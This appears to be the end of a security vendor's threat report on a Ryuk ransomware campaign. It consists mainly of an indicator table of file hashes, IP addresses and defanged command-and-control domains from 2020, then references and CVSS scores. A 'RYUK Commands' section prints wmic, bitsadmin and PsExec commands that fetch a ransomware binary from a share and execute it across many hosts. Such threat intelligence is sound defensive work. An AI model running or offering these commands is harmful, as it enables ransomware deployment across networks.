6385acd425e68e1d3fce3803f8ae06be
3/17/20
|
45.141.86.96:443
|
CN=eithtservice-developer[.]com
|
e1d1fb4a6f09fb54e09fb27167028303
3/17/20
|
45.141.86.92:443
|
CN=fourthservice-developer[.]com
|
5b5375bf30aedfa3a44d758fe42fccba
3/18/20
|
45.141.86.94:443
|
CN=sixthservice-developer[.]com
|
4d42bea1bfc7f1499e469e85cf75912c
3/18/20
|
108.61.209.121:443
|
CN=service-booster[.]com
|
692ed54fb1fb189c36d2f1674db47e45
3/18/20
|
134.122.116.114:443
|
CN=service-helpes[.]com
|
ad0914f72f1716d810e7bd8a67c12a71
3/18/20
|
209.97.130.197:443
|
CN=helpforyourservice[.]com
|
00fe3cc532f876c7505ddbf5625de404
3/18/20
|
192.241.143.121:443
|
CN=serviceshelps[.]com
|
e50998208071b4e5a70110b141542747
3/18/20
|
45.141.86.95:443
|
CN=seventhservice-developer[.]com
|
413ca4fa49c3eb6eef0a6cbc8cac2a71
3/18/20
|
198.211.116.199:443
|
CN=actionshunter[.]com
|
8e5bedbe832d374b565857cce294f061
3/18/20
|
45.141.86.155:443
|
CN=sexyservicee[.]com
|
cca37e58b23de9a1db9c3863fe2cd57c
3/19/20
|
194.26.29.239:443
|
CN=eleventhserviceupdater[.]com
|
7e0fcb78055f0eb12bc8417a6933068d
3/19/20
|
45.141.86.206:443
|
CN=servicedhunter[.]com
|
fdefb427dcf3f0257ddc53409ff71d22
3/19/20
|
45.141.86.92:443
|
CN=service-updateer[.]com
|
51ba9c03eac37751fe06b7539964e3de
3/19/20
|
134.122.116.59:443
|
CN=servicedbooster[.]com
|
db7797a20a5a491fb7ad0d4c84acd7e8
3/19/20
|
134.122.118.46:443
|
CN=servicedpower[.]com
|
7b57879bded28d0447eea28bacc79fb5
3/19/20
|
134.122.124.26:443
|
CN=serviceboostnumberone[.]com
|
880982d4781a1917649ce0bb6b0d9522
3/20/20
|
45.141.86.97:443
|
CN=ninethservice-developer[.]com
|
e4a720edfcc7467741c582cb039f20e0
3/20/20
|
178.62.247.205:443
|
CN=top-serviceupdater[.]com
|
a45522bd0a26e07ed18787c739179ccb
3/20/20
|
159.203.36.61:443
|
CN=yourserviceupdater[.]com
|
7b422c90dc85ce261c0a69ba70d8f6b5
3/20/20
|
134.122.20.117:443
|
CN=fifthserviceupdater[.]com
|
99aa16d7fc34cdcc7dfceab46e990f44
3/23/20
|
165.22.125.178:443
|
CN=servicemonsterr[.]com
|
82abfd5b55e14441997d47aee4201f6d
3/24/20
|
69.55.60.140:443
|
CN=boostyourservice[.]com
|
7f3787bf42f11da321461e6db7f295d1
3/24/20
|
45.141.86.98:443
|
CN=tenthservice-developer[.]com
|
eef29bcbcba1ce089a50aefbbb909203
3/26/20
|
178.79.132.82:443
|
CN=developmasters[.]com
|
5cf480eba910a625e5e52e879ac5aecb
3/26/20
|
194.26.29.247:443
|
CN=thirteenthservicehelper[.]com
|
2486df3869c16c0d9c23a83cd61620c2
5/4/20
|
159.65.216.127:443
|
CN=info-develop[.]com
|
5f7a5fb72c6689934cc5d9c9a681506b
9/22/20
|
69.61.38.155:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com
|
d37ba4a4b1885e96ff54d1f139bf3f47
9/22/20
|
96.9.225.144:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com
|
4408ba9d63917446b31a0330c613843d
9/22/20
|
96.9.209.216:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com
|
d921dd1ba03aaf37d5011020577e8147
9/22/20
|
107.173.58.176:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com
|
dfeb6959b62aff0b93ca20fd40ef01a8
9/22/20
|
96.9.225.143:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com
|
05c03b62dea6ec06006e57fd0a6ba22e
9/22/20
|
69.61.38.156:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com
|
c14a892f8203a04c7e3298edfc59363a
9/22/20
|
45.34.6.229:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com
|
7ed16732ec21fb3ec16dbb8df0aa2250
9/22/20
|
45.34.6.226:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com
|
1788068aff203fa9c51d85bf32048b9c
9/22/20
|
45.34.6.225:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com
|
0fff2f721ad23648175d081672e77df4
9/22/20
|
107.173.58.185:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com
|
b960355ba112136f93798bf85e6392bf
9/22/20
|
107.173.58.183:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com
|
a3d4e6d1f361d9c335effdbd33d12e79
9/22/20
|
107.173.58.175:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com
|
e13fbdff954f652f14faf11b735c0ef8
9/22/20
|
185.184.223.194:443
|
C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com
|
67310b30bada4f77f8f336438890d8f2
9/22/20
|
109.70.236.134:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com
|
ae74cbb9838688363b7928b06963c40a
9/23/20
|
64.44.131.103:443
|
C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net
|
af518cc031807f43d646dc508685bcd3
9/23/20
|
69.61.38.157:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com
|
c8fd81d6d3c8cbb8256c470a613a7c7b
9/23/20
|
193.142.58.129:443
|
C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com
|
5a22c3c8a0ed6482cad0e2b867c4c10c
9/23/20
|
45.34.6.223:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com
|
bf598ba46f47919c264514f10ce80e34
9/23/20
|
107.173.58.179:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com
|
1c8243e2787421373efcf98fc0975031
9/23/20
|
45.34.6.222:443
|
C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com
|
576d65a68900b270155c2015ac4788bb
9/23/20
|
107.173.58.180:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com
|
69643e9b1528efc6ec9037b60498b94c
9/23/20
|
107.173.58.182:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com
|
ca9b7e2fcfd35f19917184ad2f5e1ad3
9/23/20
|
45.34.6.221:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com
|
e5e0f017b00af6f020a28b101a136bad
9/24/20
|
213.252.244.62:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com
|
8367a1407ae999644f25f665320a3899
9/24/20
|
185.25.50.167:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com
|
34a78f1233e53010d29f2a4fa944c877
9/30/20
|
88.119.171.75:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com
|
eaebbe5a3e3ea1d5992a4dfd4af7a749
10/1/20
|
88.119.171.74:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com
|
adc8cd1285b7ae62045479ed39aa37f5
10/1/20
|
88.119.171.55:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com
|
bfe1fd16cd4169076f3fbaab5afcbe12
10/1/20
|
88.119.171.67:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com
|
c8a623eb355d172fc3e083763934a7f7
10/1/20
|
88.119.171.76:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com
|
0ac5659596008e64d4d0d90dfb6abe7c
10/1/20
|
88.119.171.68:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com
|
48003b6b638dc7e79e75a581c58f2d77
10/1/20
|
88.119.171.69:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com
|
5c75a6bbb7454a04b9ea26aa80dfbcba
10/1/20
|
88.119.171.73:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com
|
e391c997b757424d8b2399cba4733a60
10/1/20
|
88.119.171.77:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com
|
035697cac0ee92bb4d743470206bfe9a
10/1/20
|
88.119.171.78:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com
|
fc133bed713608f78f9f112ed7498f32
10/1/20
|
213.252.244.38:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com
|
8ead6021e2a5b9191577c115d4e68911
10/1/20
|
107.173.58.184:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com
|
1c9949d20441df2df09d13778b751b65
10/1/20
|
88.119.174.109:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com
|
c0ddfc954aa007885b467f8c4f70ad75
10/1/20
|
88.119.174.110:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com
|
ee63098506cb82fc71a4e85043d4763f
10/1/20
|
88.119.174.114:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com
|
422b020be24b346da826172e4a2cf1c1
10/1/20
|
88.119.174.116:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com
|
8d8f046e963bcd008fe4bbed01bed4c8
10/1/20
|
88.119.174.117:443
|
C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com
|
c381fb63e9cb6b0fc59dfaf6e8c40af3
10/1/20
|
88.119.174.118:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com
|
add6b742d0f992d56bede79888eef413
10/1/20
|
88.119.174.119:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com
|
9bbd073033e34bfd80f658f0264f6fae
10/1/20
|
88.119.174.121:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com
|
9afef617897e7089f59c19096b8436c8
10/1/20
|
88.119.174.120:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com
|
3f366e5f804515ff982c151a84f6a562
10/1/20
|
88.119.174.107:443
|
C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com
|
c2f99054e0b42363be915237cb4c950b
10/1/20
|
88.119.174.125:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com
|
4ac8ac12f1763277e35da08d8b9ea394
10/1/20
|
88.119.174.126:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com
|
7080547306dceb90d809cb9866ed033c
10/1/20
|
88.119.174.127:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com
|
03037dff61500d52a37efd4b4f520518
10/1/20
|
88.119.174.128:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com
|
959bed7a2662d7274b303f3b120fddea
10/1/20
|
213.252.244.126:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com
|
1d28556cc80df9627c20316358b625d6
10/1/20
|
213.252.244.170:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com
|
85e65803443046f921b9a0a9b8cc277c
10/1/20
|
213.252.246.154:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com
|
9df6ba82461aa0594ead03993c0e4c42
10/5/20
|
5.2.64.113:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com
|
18aadee1b82482c3cd5ebe32f3628f3f
10/7/20
|
5.2.79.122:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com
|
94bc44bd438d2e290516d111782badde
10/7/20
|
88.119.171.94:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com
|
f0ede92cb0899a9810a67d716cdbebe2
10/7/20
|
5.2.64.133:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com
|
e0f9efedd11d22a5a08ffb9c4c2cbb5a
10/7/20
|
5.2.64.135:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com
|
4aa2acabeb3ff38e39ed1d840124f108
10/7/20
|
5.2.72.202:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com
|
c04034b78012cca7dcc4a0fb5d7bb551
10/7/20
|
88.119.175.153:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com
|
2670bf08c43d995c74b4b83383af6a69
10/7/20
|
213.252.245.71:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com
|
127cc347b711610c3bcee434eb8bf822
10/7/20
|
213.252.246.144:443
|
C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com
|
b3e7ab478ffb0213017d57a88e7b2e3b
10/7/20
|
5.2.64.149:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com
|
188f603570e7fa81b92906af7af177dc
10/7/20
|
5.2.64.144:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com
|
22d7f35e624b7bcee7bb78ee85a7945c
10/7/20
|
88.119.174.139:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com
|
12c6e173fa3cc11cc6b09b01c5f71b0c
10/7/20
|
88.119.174.133:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com
|
28435684c76eb5f1c4b48b6bbc4b22af
10/7/20
|
88.119.175.214:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com
|
9c2d64cf4e8e58ef86d16e9f77873327
10/7/20
|
5.2.72.200:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com
|
f6f484baf1331abf55d06720de827190
10/7/20
|
5.2.79.10:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com
|
d8eacda158594331aec3ad5e42656e35
10/7/20
|
5.2.79.12:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com
|
29032dd12ea17fc37ffff1ee94cc5ba8
10/7/20
|
5.2.79.121:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com
|
eaf32b1c2e31e4e7b6d5c3e6ed6bff3d
10/7/20
|
5.2.64.174:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com
|
442680006c191692fcc3df64ec60d8fa
10/7/20
|
5.2.64.172:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com
|
0593cbf6b3a3736a17cd64170e02a78d
10/7/20
|
5.2.64.167:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com
|
38df81824bd8cded4a8fa7ad9e4d1f67
10/7/20
|
5.2.64.182:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com
|
99dbe71ca7b9d4a1d9f722c733b3f405
10/7/20
|
88.119.171.97:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com
|
7d7199ffa40c50b6e5b025b8cb2661b2
10/7/20
|
88.119.171.96:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com
|
f433d25a0dad0def0510cd9f95886fdb
10/7/20
|
96.9.209.217:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com
|
e84c7aa593233250efac903c19f3f589
10/7/20
|
69.61.38.132:443
|
C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com
|
e6e80f6eb5cbfc73cde40819007dcc53
10/13/20
|
45.147.230.131:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com
|
4fdeab3dad077589d52684d35a9ea4ab
10/13/20
|
45.147.229.92:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com
|
b70cdb49b26e6e9ba7d0c42d5f3ed3cb
10/13/20
|
45.147.229.68:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com
|
57024c1fe5c4acaf30434ba1f58f9144
10/13/20
|
45.147.229.52:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com
|
ec5496048f1962494d239d377e53db0c
10/13/20
|
45.147.229.44:443
|
C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com
|
938593ac1c8bdb2c5256540d7c8476c8
10/14/20
|
45.147.230.87:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com
|
cced46e0a9b6c382a97607beb95f68ab
10/14/20
|
45.147.230.159:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com
|
e912980fc8e9ec1e570e209ebb163f65
10/14/20
|
45.147.230.141:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com
|
39d7160ce331a157d3ecb2a9f8a66f12
10/14/20
|
45.147.230.140:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com
|
d9ca73fe10d52eef6952325d102f0138
10/14/20
|
45.147.230.133:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com
|
920d04330a165882c8076c07b00e1d93
10/14/20
|
45.147.230.132:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com
|
771463611a43ee35a0ce0631ef244dee
10/14/20
|
45.147.229.180:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com
|
1e4a794da7d3c6d0677f7169fbe3b526
10/14/20
|
45.147.230.159:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com
|
9c7fe10135f6ad96ded28fac51b79dfd
10/15/20
|
45.147.230.132:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com
|
a78c0e2920e421667ae734d923dd5ca6
10/15/20
|
45.138.172.95:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com
|
a0b2378ceae498f46401aadeb278fb31
10/16/20
|
108.62.12.119:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com
|
e95bb7804e3add830496bd36664ed339
10/16/20
|
108.62.12.105:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com
|
8d5dc95b3bd4d16a3434b991a09bf77e
10/16/20
|
108.62.12.114:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com
|
d5de2f5d2ca29da1724735cdb8fbc63f
10/16/20
|
108.62.12.116:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com
|
9c7396ecd107ee8f8bf5521afabb0084
10/16/20
|
45.147.230.141:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com
|
1134a6f276f4297a083fc2a605e24f70
10/16/20
|
45.147.230.140:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com
|
2150045f476508f89d9a322561b28ff9
10/16/20
|
45.147.230.133:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com
|
f4ddc4562e5001ac8fdf0b7de079b344
10/19/20
|
74.118.138.137:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com
|
75fb6789ec03961c869b52336fa4e085
10/19/20
|
74.118.138.115:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com
|
9f5e845091015b533b59fe5e8536a435
10/19/20
|
108.177.235.53:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com
|
4b78eaa4f2748df27ebf6655ea8a7fe9
10/19/20
|
74.118.138.138:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com
|
bcccda483753c82e62482c55bc743c16
10/21/20
|
45.153.241.1:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com
|
672c66dd4bb62047bb836bd89d2e1a65
10/21/20
|
45.153.240.240:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com
|
6825409698a326cc319ca40cd85a602e
10/21/20
|
45.153.240.194:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com
|
7f9be0302da88e0d322e5701d52d4128
10/21/20
|
45.153.240.138:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com
|
2c6a0856d1a75b303337ac0807429e88
10/21/20
|
45.153.240.136:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com
|
6559dbf8c47383b7b493500d7ed76f6a
10/23/20
|
45.153.240.157:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com
|
7bd044e0a6689ef29ce23e3ccb0736a3
10/23/20
|
45.153.240.178:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com
|
9859a8336d097bc30e6e5c7a8279f18e
10/23/20
|
45.153.240.220:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com
|
43fb2c153b59bf46cf6f67e0ddd6ef51
10/23/20
|
45.153.240.222:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com
|
22bafb30cc3adaa84fef747d589ab235
10/23/20
|
45.153.241.134:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com
|
31e87ba0c90bb38b986af297e4905e00
10/23/20
|
45.153.241.138:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com
|
f8a14846b7da416b14303bced5a6418f
10/23/20
|
45.153.241.146:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com
|
01abdaf870d859f9c1fd76f0b0328a2b
10/23/20
|
45.153.241.153:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com
|
c2eaf144e21f3aef5fe4b1502d318ba6
10/23/20
|
45.153.241.158:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com
|
de54af391602f3deea19cd5e1e912316
10/23/20
|
45.153.241.167:443
|
C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com
|
5f6fa19ffe5735ff81b0e7981a864dc8
10/23/20
|
45.147.231.222:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com
|
ff54a7e6f51a850ef1d744d06d8e6caa
10/23/20
|
45.153.241.141:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com
|
4cda9d0bece4f6156a80967298455bd5
10/26/20
|
74.118.138.139:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com
|
e317485d700bf5e8cb8eea1ec6a72a1a
10/26/20
|
108.62.12.12:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com
|
e0022cbf0dd5aa597fee73e79d2b5023
10/26/20
|
108.62.12.121:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com
|
44e7347a522b22cdf5de658a4237ce58
10/26/20
|
172.241.27.65:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com
|
cd3e51ee538610879d6fa77fa281bc6f
10/26/20
|
172.241.27.68:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com
|
04b6aec529b3656040a68e17afdabfa4
10/26/20
|
172.241.27.70:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com
|
200c25c2b93203392e1acf5d975d6544
10/26/20
|
45.153.241.139:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com
|
9d7c52c79f3825baf97d1318bae3ebe2
10/27/20
|
45.153.241.14:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com
|
5bae28b0d0e969af2c0eda21abe91f35
10/28/20
|
190.211.254.154:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com
|
a1e62e7e547532831d0dd07832f61f54
10/28/20
|
81.17.28.70:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com
|
67c7c75d396988ba7d6cd36f35def3e4
10/28/20
|
81.17.28.105:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com
|
880e59b44e7175e62d75128accedb221
10/28/20
|
179.43.160.205:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com
|
cdea09a43bef7f1679e9cd1bbeb4b657
10/28/20
|
179.43.158.171:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com
|
512c6e39bf03a4240f5a2d32ee710ce5
10/28/20
|
179.43.133.44:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com
|
87f3698c743f8a1296babf9fbebafa9f
10/28/20
|
179.43.128.5:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com
|
6df66077378c5943453b36bd3a1ed105
10/28/20
|
179.43.128.3:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com
|
9706fd787a32a7e94915f91124de3ad3
10/28/20
|
81.17.28.122:443
|
C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com
|
0e1b0266de2b5eaf427f5915086b4d7c
RYUK Commands
start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create “cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe”
start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY “\\[REDACTED]\share$\vVv.exe” “C:\windows\temp\vVv.exe”
start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe
FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.
Platform
|
Signature Name
—|—
Endpoint Security
|
Network Security and Email Security
|
github.com/Sw4mpf0x/PowerLurk
research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
thedfirreport.com/2020/10/18/ryuk-in-5-hours/
www.fireeye.com/advantage/
www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf
www.fireeye.com/content/fireeye-www/en_US/blog/executive-perspective/2020/10/ransomware-the-threat-we-can-no-longer-afford-to-ignore.html
www.fireeye.com/content/fireeye-www/en_US/blog/products-and-services/2020/06/sizing-up-how-mandiant-evaluates-ransomware-defense.html
www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html
www.youtube.com/watch?v=X8r-M-TjT3k
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C